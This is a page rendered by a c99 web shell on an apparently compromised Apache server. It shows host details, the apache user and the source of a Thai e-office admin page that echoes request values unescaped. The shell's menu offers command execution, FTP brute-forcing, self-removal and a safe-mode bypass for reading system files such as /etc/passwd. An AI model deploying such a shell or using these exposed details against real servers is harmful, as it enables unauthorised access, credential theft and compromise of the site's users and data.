!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/admin/   drwxr-xr-x
Free 52.34 GB of 127.8 GB (40.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     addSetPsDept.php (4.14 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once "template.php";
include_once "../class/clsTable.php";
include_once "../class/clsDepartment.php";
include_once "../class/clsPerson.php";
include_once "../link/function.php";
include_once "../link/keyThai.php";
include_once "../class/clspsdept.php";
include_once "getPrefix.php";
$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDP = new Department($oC);
$oDP2 = new Department($oC);
$oDP3 = new Department($oC);
$oPS = new person($oC);
$oPSd = new psdept($oC);
$maxdocgroup=$oDP->SearchMaxDocGroup();
?>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=tis-620">
<link href="../source/style.css" rel="stylesheet" type="text/css">
</head>
<body>
<iframe id="changeDept" name="changeDept" src="" style="width:0px;height:0px;border:0"></iframe>
<br>
<table  width=703  align="center">
<tr><td height="150">
<fieldset>
      <legend><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_3"]; ?>"><a href="?mm=1">จัดการข้อมูลบุคลากรและโครงสร้าง</a>
	 <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle"><a href="setPsDept.php">กำหนดผู้ใช้ทั่วไปในหน่วยงานรอง</a>
	 <img src="../picture/ico3.gif" width="10" height="10" border="0" align="absmiddle">เลือกหน่วยงาน
	 </font></legend><br>
	 <form name="ff"  METHOD="POST" action="processSetPsDept.php">
				 <?			$oPS->SearchByKey($ps); $oPS->GetRecord();  
				?>
  <table width="80%" border="0" align="center" cellpadding="0" cellspacing="0">
  			<tr>
			<td height="30" align="left">&nbsp;&nbsp;&nbsp;&nbsp;
			<font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"];?>"><strong>ชื่อ - นามสกุล :: </strong></font><? echo GetPrefix($oPS->prefixId).$oPS->fName."&nbsp;".$oPS->lName;  ?></td>
		  </tr>
		  <tr><td height="25">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<font size="2" color="<?php echo $GLOBALS["COLOR_FONT_2"];?>"><strong>เลือกหน่วยงาน</strong></font></td></tr>
			<tr>
			<td align="center">
              <table width="80%" height="115" border="0" align="center" cellpadding="0" cellspacing="0" >
          <?php 

		  		$oDP->SearchBydeptDateDocGroup($maxdocgroup);
				while($oDP->GetRecord()){
								$oPSd->SearchBypersonIddeptId($ps,$oDP->deptId,$maxdocgroup);
								$oPSd->GetRecord();
								if(($i%2) == 0)
									      echo "<tr>";
								    else
								          echo "<tr bgcolor=\"".$GLOBALS['COLOR_BG_TABLE_8']."\">";
?>
            <td align="left" height="22"><font size="2" color="<?php echo $GLOBALS["COLOR_FONT_4"];?>">&nbsp;&nbsp;&nbsp;
			<? if($oDP->deptId==$oPS->deptId){  echo '<img src=../picture/checked.gif align=absbottom>';  }else{ ?><input name="deptId[<? echo $oDP->deptId; ?>]" type="checkbox" value="<? echo $oDP->deptId; ?>" <? if($oDP->deptId==$oPSd->deptId){ echo "checked"; } ?>><? } ?>&nbsp;<? echo $oDP->deptName; if($oDP->deptId==$oPS->deptId){  echo "&nbsp;(หน่วยงานย่อยที่สังกัดอยู่แล้ว)"; }?></font></td>
          </tr>
		  <? $i++;  } ?>
       </table>
            </td>
          </tr>
		  <tr><td>&nbsp;</td></tr>
		  <tr><td align="center">
		  <input name="name" type="hidden" value="<?php echo $name; ?>">
		   <input name="ps" type="hidden" value="<?php echo $ps; ?>">
		   <input name="showrep" type="hidden" value="<?php echo $showrep; ?>">
		   <input name="showrepedit" type="hidden" value="<?php echo $showrepedit; ?>">
		   <input name="method" type="hidden">
		  <input name="addpsdept" type="submit" value="บันทึก" onClick="return checkFormat();">
		  <input type="button" name="cancel" value="กลับหน้าหลัก" onClick="location.href = 'setPsDept.php?name=<? echo $name; ?>'"></td></tr>
		  </table> </form>
</fieldset>
<br><br> <br><br> <br><br>
</td>
</tr>
</table>
</body>
</html>
<script language="javascript">
function checkFormat(){
		//window.alert("หมายเหตุ :: การปรับโครงสร้างเพื่อการส่งหนังสือในระบบสารบรรณจะเปลี่ยนแปลง\nข้อมูลหน่วยงาน และข้อมูลบุคลากร ผู้รับผิดชอบระบบ\nต้องตั้งค่าการใช้งานระบบใหม่");
		var agree=confirm("คุณต้องการบันทึกการกำหนดผู้ใช้ทั่วไปในหน่วยงานรองใช่หรือไม่ ?");
		if (agree){
				    return true ;
		}else{
					return false ;
		}	
}
</script>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0049 ]--